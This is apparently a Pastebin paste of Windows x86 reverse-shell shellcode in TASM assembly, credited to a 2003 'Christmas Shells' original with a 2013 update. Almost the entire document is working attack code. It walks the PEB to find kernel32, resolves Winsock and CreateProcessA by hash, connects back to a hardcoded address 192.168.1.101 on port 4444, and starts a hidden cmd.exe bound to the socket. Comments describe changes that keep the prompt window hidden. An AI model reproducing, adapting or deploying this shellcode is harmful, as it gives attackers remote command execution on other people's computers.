Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ;*********************************** class101 Update (2013) *********************************
- ;
- ; Removed : hardcoded offset to PEB (not reliable in 2013)
- ; Removed : system() (requires AllocConsole, prompt crashes if parent crashes)
- ; Removed : AllocConsole() (prompt window visible)
- ; Updated : kernel32 base address detection (was finding KERNELBASE.dll on newer Windows)
- ; Added : CreateProcess() (does not requires AllocConsole, prompt hidden
- ; and does not crashes if parent crashes)
- ;
- ; +24 (18h) bytes
- ;
- ; Update by Arnaud 'class101' Dovi - ad@heapoverflow.com
- ; http://steamcommunity.com/id/class101
- ; http://heapoverflow.com
- ;
- ;*********************************** Christmas Shells (2003) ********************************
- ; Callback Shell.
- ; Directly set std handles and call system()
- ;
- ; 206 (CEh) bytes
- ;
- ; its not code, its antic0de
- ; and it works now too %-)
- ; Left it in tasm format.
- ; tasm32 -ml /m5 shell.asm
- ; tlink32 -Tpe -c -x shell.obj ,,, import32
- ;
- ;*********************************** Christmas Shells ***************************************
- ; Jimminy jellicas its been jimplemented.
- ; Oddity,Dsp,Shammah,Santa Claus and the rest of the loco locals
- ; All the o/s peeps who know whats what.
- ;********************************************************************************************
- .586p
- locals
- .model flat, stdcall
- extrn ExitProcess:PROC
- extrn WSAStartup:PROC
- extrn WSACleanup:PROC
- .data
- wsadescription_len equ 256
- wsasys_status_len equ 128
- WSAdata struct
- wVersion dw ?
- wHighVersion dw ?
- szDescription db wsadescription_len+1 dup (?)
- szSystemStatus db wsasys_status_len+1 dup (?)
- iMaxSockets dw ?
- iMaxUdpDg dw ?
- lpVendorInfo dw ?
- WSAdata ends
- wsadata WSAdata <?>
- .code
- ;****************************************************************************
- ; Winsock + copy to stack code
- ;****************************************************************************
- start:
- ; Winsock start up
- push offset wsadata
- push 0101h
- call WSAStartup
- or eax, eax
- jz winsock_found
- jmp codeend
- winsock_found:
- ; copy ourselves onto stack
- mov ebx,offset realstart
- sub esp,400h
- mov eax,esp
- Copyit:
- mov cl,byte ptr [ebx]
- mov byte ptr [eax],cl
- inc eax
- inc ebx
- cmp ebx,offset codeend
- jle Copyit
- jmp esp
- ;****************************************************************************
- ; This is the start of the shell code
- ;****************************************************************************
- realstart:
- jmp over_data
- ; 8 bytes of socket
- sockdat db 02h,01h,11h,5Ch ; 115C, port (4444)
- db 0c0h,0a8h,01h,65h ; IP address 192.168.1.101
- ; 16 bytes of data
- hashes db 01h ; Termination
- ;dw 364Ah ; System msvcrt.dll ; - 9 bytes
- ;db "MSVCRT",01 ;
- dw 422Ah ; WSASocket ws2_32.dll
- dw 8AD4h ; Connect ws2_32.dll
- db "WS2_32",01
- dw 35E8h ; CreateProcessA kernel32.dll ; + 0 bytes
- dw 4E2Ch ; LoadLibrary kernel32.dll
- ;;;dw 817Ch ; AllocConsole kernel32.dll
- over_data:
- ; 7 byte Getself code
- push 0ACC3575Fh ; Pop/Push/Ret
- call esp ; EIP returned in EDI
- ; EDI - 7 points to end of hashes
- ; find Kernel32 base + store peb address
- ;;;mov esi,7ffdf00ch ; Offset into PEB
- xor eax, eax ; ECX = 0 ; + 4 bytes
- mov esi, fs:[eax + 30h] ; Offset into PEB ;
- add esi,0Ch ; PPROCESS_MODULE_INFO (PEB_LDR_DATA)
- lodsd ; PPROCESS_MODULE_INFO
- push dword ptr [esi] ; Store PEB->ProcessParameters->base address for later
- ;;;mov esi,[eax + 1ch] ; InInitializationOrderModuleList
- ;;;lodsd ; Grab Next Pointer (Kernel32.dll) in eax
- ;;;mov edx,[eax + 08h] ; EDX = kernel32.dll base address
- mov esi,[eax + 0Ch] ; ; + 2 bytes
- lodsd ; Grab Next Pointer (main executable) in eax ;
- xchg esi,eax ; Only 1 byte with AX/EAX ;
- lodsd ; Grab Next Pointer (main executable) in eax ;
- mov edx,[eax + 18h] ; EDX = kernel32.dll base address ;
- push -8 ; EDI Adjuster for later loadlibrary calls
- lea ebx,[edi-8] ; EBX Holds address of hashes
- LookupFunctions:
- push esp ; Reset the stack base pointer
- pop ebp ; So we can use EBP, and store current stack pos
- ; get RVA tables
- mov ecx,dword ptr [edx + 3ch] ; Get NT Header Offset Address. Base + 3ch
- mov esi,dword ptr [ecx + edx + 78h] ; Add Base And Move To Data Dictionary
- lea esi,dword ptr [esi + edx + 1ch] ; Add Base And Move To The Tables
- mov cl,3 ; 3 Loops, ECX was holding the NT Header offset 0x00d0 or similiar
- StoreAddress:
- ; Store address's
- lodsd ; EAX = Address Table / Name Ptrz / Ordinal RVA
- add eax,edx ; Add Base Location
- push eax ; Store it on stack
- loop short StoreAddress ; Loopy
- ;*************************************************************************
- ; [EDI-7] = end of hashes
- ; EDI = start of Function address storage location
- ; EDX = dll base address
- ; EBX = address of hashes +1 (offset for loadlib implementation)
- ;*************************************************************************
- SearchStart:
- dec ebx ; Dec our EBX pointer to the hashes.
- mov esi,dword ptr [ebp - 8] ; Get Name Ptrz Table
- xor eax,eax ; Set Our API Counter To 0
- push eax ; Push a 0 for later
- Search:
- push eax ; Store our API counter
- lodsd ; Load address of function name from [ESI] into EAX
- add eax,edx ; Add DLL base address
- xor ecx,ecx ; Zero our hash value counter
- hashy:
- add cx,word ptr [eax] ; Add it up
- add cl,byte ptr [eax] ; Add it up
- inc eax ; Move along
- cmp byte ptr [eax],01 ; End of string
- jge hashy ; Nup
- pop eax ; Restore Our API Counter
- inc eax ; Inc our API counter
- cmp cx,[ebx] ; Compare To Hash Value
- jne Search ; We go and check the next name if they don't match
- ; GotMatch
- pop esi ; Pop a 0
- xchg esi,eax ; Get Our API Counter Into ESI, 0 into EAX
- dec esi ; Adjust our API counter back 1
- shl esi,1 ; ESI = ESI * 2
- add esi,dword ptr [ebp - 0ch] ; Normalize With Ordinal VA
- lodsw ; Get Ordinal in AX Word Only
- shl eax,2 ; EAX = AX * 4
- add eax,dword ptr [ebp - 4h] ; Normalize With Address VA
- xchg esi,eax ; Swap them around
- lodsd ; Load Function address into EAX
- add eax,edx ; Normalize with the base and all is done.
- stosd ; Store the function location in [EDI]
- ; We sub 1 here, 1 up at SearchStart. Strange loadlib implementation
- dec ebx ; To move to next hash. No byte loss
- cmp byte ptr [ebx],01h ; Hash dll seperator
- jne short SearchStart ; Go and find another API
- ; Requires a loadlibrary call
- leave ; Adjust stack back, pops EDI adjuster in EBP
- dec byte ptr [ebx] ; Create a null terminator
- sub ebx,06h ; Move down hash table
- cmp byte ptr [ebx],11h ; Past our hashes? (!!! 11h TO UPDATE AFTER THE PORT !!!)
- je short Done_Finding ; Done
- push ebx ; Push address of dll
- call dword ptr [edi + ebp] ; Call LoadLibrary
- xchg edx,eax ; Save base Address
- push -16 ; Store EDI Adjuster
- dec ebx ; We sub 1 here, 1 up at SearchStart. Strange loadlib implementation
- jne short LookupFunctions ; Load the next DLLS functions
- Done_Finding:
- ;*****************************************
- ; [EDI - 04h] WSASocket
- ; [EDI - 08h] Connect
- ; [EDI - 0ch] CreateProcess
- ; [EDI - 10h] LoadLibrary
- ;*****************************************
- ;;;xchg eax,ebp ; Store the system() address ; -1 bytes
- ;;;; Create console
- ;;;call [EDI - 10h] ; Call AllocConsole() ; -3 bytes
- xor ecx,ecx ; Null ECX
- ; call WSASocket
- push ecx ; Push 0
- push ecx ; Push 0
- push ecx ; Push 0
- push ecx ; Push 0
- inc ecx ; Increment ecx
- push ecx ; Push 1
- inc ecx ; Increment ecx
- push ecx ; Push 2
- call [edi - 04h] ; Call WSASocket
- xchg ecx,edi ; Store API storage
- ; Directly edit the std handles
- pop edi ; Pop PEB->ProcessParameters->base address
- ;;;add edi,18h ; And adjust
- sub di, -90h ; EDI = CreateProcess structure location
- push 20646D63h ; Push cmd on stack (CreateProcess structure)
- push esp ; Push readable dummy location (CreateProcess structure)
- push edi ; Push writable structure location (CreateProcess structure)
- mov word ptr [edi+2Ch],101h ; si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; (CreateProcess structure)
- sub di, -38h ; EDI = handles location
- stosd ; Set handle in CreateProcess structure
- stosd ; Set handle in CreateProcess structure
- stosd ; Set handle in CreateProcess structure
- ; Setup socket data
- dec ebx ; Need to
- dec byte ptr [ebx] ; Remove 01
- dec ebx ; And position
- ; call connect
- push ebx ; Push the name structure length. Doesn't seem to matter. std is 10h
- push ebx ; Push location of structure
- push eax ; Push socket
- xchg esi,ecx ; Store API storage
- call [esi - 08h] ; Call Connect
- ; Call CreateProcess
- xor ecx,ecx
- push ecx ; NULL
- push ecx ; NULL
- push ecx ; 0
- push 1 ; Inherit handles
- push ecx ; NULL
- push ecx ; NULL
- lea eax,[esp+20h] ; Get command line location
- push eax ; Push command line location
- push ecx ; NULL
- call [esi - 0ch] ; Call CreateProcessA
- ;push esp ; Location to cmd
- ;call ebp ; Call system()
- ;;;call WSACleanup
- codeend:
- end start
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement